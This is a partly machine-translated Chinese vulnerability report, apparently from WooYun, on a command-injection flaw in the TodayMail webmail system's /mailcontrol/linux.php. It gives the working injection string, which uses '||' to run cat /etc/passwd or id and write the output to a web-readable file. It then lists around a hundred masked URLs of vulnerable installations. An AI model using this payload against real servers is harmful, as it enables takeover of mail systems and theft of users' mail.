TodayMail邮件系统存在命令执行至少上万邮箱可被控制(官网演示)

漏洞标题 TodayMail邮件系统存在命令执行至少上万邮箱可被控制(官网演示) 相关厂商 广东时代互联科技有限公司 漏洞作者 路人甲 提交时间 2016-03-21 16:59 公开时间 2016-…

漏洞标题 TodayMail邮件系统具有执行至少数万个可控制邮箱的命令(官方网站演示) 相关制造商 广东时代互联网科技有限公司 漏洞作者 过路人 提交时间 2016-03-21 16: 59 公共时间 2016-06-19 17: 40 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php源查看,不过滤敏感文件操作参数 漏洞详细信息 关于使用量不多说,以下链接 /mailcontrol/linux.php?name=x||cat%20/etc/passwd>/webmail/data/wo.txt||x 可以直接执行任何命令来获取服务器权限 官方网站演示测试: 0x1http://**。**。**。**/webmail/login.php 访问 http://**。**。**。**/mailcontrol/linux.php?name=x || id>/webmail/data/wo.txt || x 您可以在数据目录中生成wo.txt。 http://**。**。**。**/webmail/data/wo.txt

0x2http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/data/wo.txt

案件非常多,仅提供100多个案例: http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php Failure when receiving data from the peer http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php **。**。**。** /网络邮件/login.php中 **。**。**。** /网络邮件/login.php中 http://**。**。**。**。mo/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php **。**。**。** /网络邮件/login.php中 http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php **。**。**。** /网络邮件/login.php中 **。**。**。** /网络邮件/login.php中 http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php **。**。**。** /网络邮件/login.php中 http://**。**。**。**/webmail/login.php **。**。**。**: 88/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**。mo/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php Failure when receiving data from the peer 0x1http://**。**。**。**/webmail/login.php 访问 http://**。**。**。**/mailcontrol/linux.php?name=x || id>/webmail/data/wo.txt || x 您可以在数据目录中生成wo.txt。 http://**。**。**。**/webmail/data/wo.txt

0x2http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/data/wo.txt

修理计划: 过滤它 版权声明:请注明出处。居民A @乌云